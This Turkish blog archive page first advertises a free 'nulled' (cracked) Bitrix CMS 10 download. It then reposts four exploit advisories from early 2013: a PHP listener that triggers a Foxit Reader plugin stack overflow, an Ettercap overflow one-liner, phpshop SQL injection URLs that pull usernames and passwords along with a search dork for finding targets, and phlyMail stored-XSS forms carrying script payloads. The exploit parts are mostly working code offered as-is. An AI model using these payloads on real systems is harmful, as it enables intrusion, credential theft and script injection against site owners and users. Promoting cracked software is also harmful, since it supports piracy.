Archive for 14 Ocak 2013

Bitrix CMS nulled 10 Yeni Teknolojiler

bitrix-10

– IOS, Android ve BlackBerry OS desteklemek ve mobil web siteleri geliştirmek için BitrixMobile. Teknolojisi.

– Hazır Mobil online mağaza teknoloji BitrixMobile dayanmaktadır.

– Web tabanlı siteler için performans, ölçeklenebilirlik ve güvenilirliği artırmak.

– Sosyal ağlar Facebook, VKontakte, Twitter MoyMir@Mail.Ru ile entegrasyon.

– Üretim yeri ve içerik yönetim işbirliğini otomatikleştirmek için Web arayüzleri

– Sonuçlarında ipuçları ile içerik web siteniz için anlık arama mekanizması.

– 1C ile Entegrasyon: Kurumsal 8.2, online mağaza SKU ile çalışmak için      destek verir

– Sitenin medyanın yaratılması için komple çözüm “Portal”.  – Günlük kullanıcıların rahatlığı için  Canlı oturum

Bitrix CMS nulled

-. İçerik Yönetim Sistemi web sitesi 1C-Bitrix istikrarlı performansı ve web proje maliyet-etkin gelişimi sağlar, ve basit yapısı ve içerik yönetimi nedeniyle sitenin bakım maliyetini en aza indirmek için.  Site yönetimi özel bilgi gerektirmez.   Microsoft Word de belge oluşturmak zor değildir.

Ürün özellikleri:

– Site yapısının Kolay yönetimi: kopyalama, taşıma, silme, web arayüzü aracılığıyla yeni bölümleri ve site dosyaları oluşturmak

– Kolay site için kullanıcı dostu kontrol paneli kamu kesimi doğrudan ortak işlemleri gerçekleştirmek

– Site menüsünde, silme, menü öğeleri ilavesi ve yeni tip sınırsız sayıda menüler oluşturmak için yetenekli yönetimi

– Sitenin dosyalarını ve görüntüleri yükleme

– Muhasebe yazılımı ve iş akışı sistemleri ile entegrasyon  Endüstri standardı veritabanları ile % 100 entegrasyon, MySQL, MSSQL, Oracle (ürünlerinin ücretsiz sürümlerini kullanın – MySQL, OracleXE – önerilen)

Online alışveriş ve telefon destek hizmeti kullanıcılara (güvenlik ürün içerisindeki dahili düzenlenmiş erişim operatörleri) bütünleştirilmesi.  Sitede yer kolaydır: kurumsal belge entegrasyon özellikleri (karşılaştırmalı alışveriş özellikleri ve aksesuarları, konu ile ilgili makaleleri, vb katalog parametrik arama), e-ticaret mağazası bir sürü haberler, makaleler, basın bültenleri, duyurular, katalog, , fotoğraf albümü (1C versiyonları 7.7 ve 8.0 desteklenmez).

CMS Bitrix 10 Nulled sitesinden bedava indirebilirsiniz

Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow

Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow Açığına ilişkin açıklamalama exploit aşağıdaki gibidir.


<?php /* Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong Query String Remote Stack Buffer Overflow PoC --------------------------- rgod

(listener)

Tested against Microsoft Windows Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920 Foxit Reader 5.4.4.1128

File: npFoxitReaderPlugin.dll Version: 2.2.1.530

Product url: <a href="http://www.foxitsoftware.com/downloads/">http://www.foxitsoftware.com/downloads/</a> Last version setup file: FoxitReader544.11281_enu_Setup.exe

Usage: Launch from the command line, then browse port 6666 with Firefox. You can test it also through this url:

<a href="http://192.168.0.1/x.pdf?[A">http://192.168.0.1/x.pdf?[A</a> x 1024]

File must be existing or the server should be responding with the proper Content-Type header.

vulnerable code, npFoxitReaderPlugin.dll:

;------------------------------------------------------------------------------  L1000162F:     push ebx     push esi     push edi     mov edi,ebp     or ecx,FFFFFFFFh     xor eax,eax     xor ebx,ebx     xor esi,esi     repne scasb     not ecx     dec ecx     test ecx,ecx     jle L100016E4  L1000164A:     mov al,[esi+ebp]     mov word ptr [esp+18h],0000h     cmp al,25h     jz  L10001661     mov ecx,[esp+1Ch]     mov [ebx+ecx],al     jmp L100016CE  L10001661:     mov al,[esi+ebp+01h]     cmp al,30h     jl  L1000166D     cmp al,39h     jle L1000167D  L1000166D:     cmp al,41h     jl  L10001675     cmp al,46h     jle L1000167D  L10001675:     cmp al,61h     jl  L100016C6     cmp al,66h     jg  L100016C6  L1000167D:     mov dl,[esi+ebp+01h]     inc esi     inc esi     lea ecx,[esp+10h]     mov [esp+18h],dl     push ecx     mov al,[esi+ebp]     lea edx,[esp+1Ch]     push L100450D4     push edx     mov [esp+25h],al     call SUB_L10006421     mov eax,[esp+1Ch]     lea ecx,[esp+24h]     push eax     push L100450D0     push ecx     call SUB_L100063CF     mov eax,[esp+34h]     mov dl,[esp+30h]     add esp,00000018h     mov [ebx+eax],dl     jmp L100016CE  L100016C6:     mov ecx,[esp+1Ch]     mov byte ptr [ebx+ecx],25h  L100016CE:     inc ebx     mov edi,ebp     or ecx,FFFFFFFFh     xor eax,eax     inc esi     repne scasb     not ecx     dec ecx     cmp esi,ecx     jl  L1000164A  L100016E4:     mov edx,[esp+1Ch]     pop edi     pop esi     mov eax,00000001h     mov byte ptr [ebx+edx],00h     pop ebx     pop ebp     pop ecx     retn ;------------------------------------------------------------------------------

this copy loop ends up in overwriting stack pointers, then (by attaching to plugin-container.exe):

(f48.1778): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8 eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202 npFoxitReaderPlugin!NP_GetEntryPoints+0x15672: 10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=???????? ... Attempt to write to address 41414141 ...

also SEH pointers are overwritten */

error_reporting(0);

set_time_limit(0);

$port = 6666;

$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".                 "Server: Apache\r\n".                 "Location: /x.pdf?".str_repeat("A",1024)."\r\n".                 "Content-Type: text/html\r\n\r\n";

$____boom     = "HTTP/1.1 200 OK\r\n".                 "Server: Apache\r\n".                 "Accept-Ranges: bytes\r\n".                 "Content-Length: 60137\r\n".                 "Content-Type: application/pdf\r\n".                 "Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

if (!$socket) {   echo "$errstr ($errno)\n"; } else {   echo "Listening on public tcp port ".$port." \n";    while ($conn = stream_socket_accept($socket)) {     $line=fgets($conn);     echo $line."\n";     if (strpos($line,".pdf")){       fwrite($conn,$____boom);     }     else {       fwrite($conn,$____redirect);     }     fclose($conn);   }   fclose($socket); } ?>

 

Ettercap 0.7.5.1 Stack Overflow Vulnerability

Ettercap 0.7.5.1 Stack Overflow Açığı bulunmuş olup, Açık hakkındaki exploit ve açıklamalar aşağıdaki gibidir.

 


Title: Ettercap Stack overflow (CWE-121) References: CVE-2012-0722 Discovered by: Sajjad Pourali Vendor: <a href="http://www.ettercap.sourceforge.net/">http://www.ettercap.sourceforge.net/</a> Vendor contact: 13-01-01 21:20 UTC (No response) Solution: Using the patch Patch: <a href="http://www.securation.com/files/2013/01/ec.patch">http://www.securation.com/files/2013/01/ec.patch</a>

Local: Yes Remote: No Impact: low

Affected:  - ettercap 0.7.5.1  - ettercap 0.7.5  - ettercap 0.7.4 and earlier Not affected:  - ettercap 0.7.4.1

---

Trace vulnerable place:

./include/ec_inet.h:27-44 enum {    NS_IN6ADDRSZ            = 16,    NS_INT16SZ              = 2,

ETH_ADDR_LEN            = 6,    TR_ADDR_LEN             = 6,    FDDI_ADDR_LEN           = 6,    MEDIA_ADDR_LEN          = 6,

IP_ADDR_LEN             = 4,    IP6_ADDR_LEN            = 16,    MAX_IP_ADDR_LEN         = IP6_ADDR_LEN,

ETH_ASCII_ADDR_LEN      = sizeof("ff:ff:ff:ff:ff:ff")+1,    IP_ASCII_ADDR_LEN       = sizeof("255.255.255.255")+1,    IP6_ASCII_ADDR_LEN      = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,    MAX_ASCII_ADDR_LEN      = IP6_ASCII_ADDR_LEN, };

./include/ec_resolv.h:42 #define MAX_HOSTNAME_LEN   64

./src/ec_scan.c:610-614 char ip[MAX_ASCII_ADDR_LEN]; char mac[ETH_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN];

./src/ec_scan.c:633-635 if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||          *ip == '#' || *mac == '#' || *name == '#')          continue;

---

PoC:

sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow

---

+ Sajjad Pourali  + <a href="http://www.securation.com">http://www.securation.com</a>  + Contact: sajjad[at]securation.com

CMS phpshop 2.0 SQL Injection Vulnerability

CMS phpshop 2.0 SQL Injection Açığı bulunmuş olup, SL injectionun oluşum yeri ve açık bulucunun açık hakkındaki açıklamaları şu şekilde yeralmaktadır;


# Exploit Title : phpshop 2.0 SQL Injection Vulnerability # Author        : By onestree # Software Link : <a href="http://code.google.com/p/phpshop/downloads/list">http://code.google.com/p/phpshop/downloads/list</a> # tested        : windows 7 / ubuntu # Dork          : inurl:"tanyakan pada rumput yang bergoyang"

SQLi p0c:   ==================

<a href="http://localhost/phpshop">http://localhost/phpshop</a> 2.0/?page=admin/function_list&module_id=11' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

<a href="http://localhost/phpshop">http://localhost/phpshop</a> 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--

&nbsp;

Thanks :

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell                indonesiancoder - moeslimh4x0r - go-coder

 

phlyLabs phlyMail Lite 4.03.04 Path Disclosure and Stored XSS Vulnerabilities

phlyLabs phlyMail Lite 4.03.04 Path Disclosure and Stored XSS Açığı bulunmuş olup, Açık bulucunun açık hakkındaki açıklamaları, açığın oluşum yeri hakkındaki açıklamaları şu şekilde;


<!--

phlyLabs phlyMail Lite 4.03.04 Path Disclosure and Stored XSS Vulnerabilities

Vendor: phlyLabs Product web page: <a href="http://www.phlymail.com">http://www.phlymail.com</a> Affected version: Lite 4.03.04

Summary: phlyMail offers you an interface in the browser to have access to your emails, contacts, appointments, tasks, files and bookmakrs from anyhwere, where you have internet access. This can be your home, workplace, train station, abroad, offroad, in the woods or your own backyard.

Desc: phlyMail suffers from multiple stored XSS vulnerabilities (post-auth) and Path Disclosure when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site and displaying the full webapp installation path.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)            Apache 2.4.2 (Win32)            PHP 5.4.4            MySQL 5.5.25a

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                             @zeroscience

Advisory ID: ZSL-2013-5122 Advisory URL: <a href="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5122.php">http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5122.php</a>

13.01.2013

-->

<html> <head> <title>Download</title> </head> <body><center><br />

<form method="POST" action="<a href="http://localhost/config.php?action=users&whattodo=savenewuser">http://localhost/config.php?action=users&whattodo=savenewuser</a>"> <input type="hidden" name="MOTD" value="ZSL" /> <input type="hidden" name="PHM[active]" value="1" /> <input type="hidden" name="PHM[cellular]" value='"><script>alert(1);</script>' /> <input type="hidden" name="PHM[customer_number]" value='"><script>alert(2);</script>' /> <input type="hidden" name="PHM[email]" value='"><script>alert(3);</script>' /> <input type="hidden" name="PHM[externalemail]" value='"><script>alert(4);</script>' /> <input type="hidden" name="PHM[fax]" value='"><script>alert(5);</script>' /> <input type="hidden" name="PHM[firstname]" value='"><script>alert(6);</script>' /> <input type="hidden" name="PHM[lastname]" value='"><script>alert(7);</script>' /> <input type="hidden" name="PHM[password2]" value="django" /> <input type="hidden" name="PHM[password]" value="django" /> <input type="hidden" name="PHM[tel_business]" value='"><script>alert(8);</script>' /> <input type="hidden" name="PHM[tel_private]" value='"><script>alert(9);</script>' /> <input type="hidden" name="PHM[visibility]" value="private" /> <input type="hidden" name="PHM[www]" value='"><script>alert(10);</script>' /> <input type="hidden" name="debugging_level" value="0" /> <input type="hidden" name="language" value="en" /> <input type="hidden" name="sessioncookie" value="0" /> <input type="hidden" name="sessionip" value="0" /> <input type="hidden" name="showmotd" value="1" /> <input type="hidden" name="theme" value="Yokohama" /> <input type="hidden" name="uid" value='"><script>alert(11);</script>' /> <input type="submit" value="XSS #1" /> </form>

<br />

<form method="POST" action="<a href="http://localhost/config.php?action=view&screen=bookmarks&module=Bookmarks&do=edititem&save=1&id=1">http://localhost/config.php?action=view&screen=bookmarks&module=Bookmarks&do=edititem&save=1&id=1</a>"> <input type="hidden" name="desc" value="ZSL" /> <input type="hidden" name="group" value="1" /> <input type="hidden" name="is_favourite" value="1" /> <input type="hidden" name="name" value='"><script>alert(12);</script>' /> <input type="hidden" name="url" value='"><script>alert(13);</script>' /> <input type="submit" value="XSS #2" /> </form>

<br />

<form method="GET" action="<a href="http://localhost/frontend/derefer.php?go=joxy%00">http://localhost/frontend/derefer.php?go=joxy%00</a>"> <input type="submit" value="PD #1" /> </form>

</center></body> </html>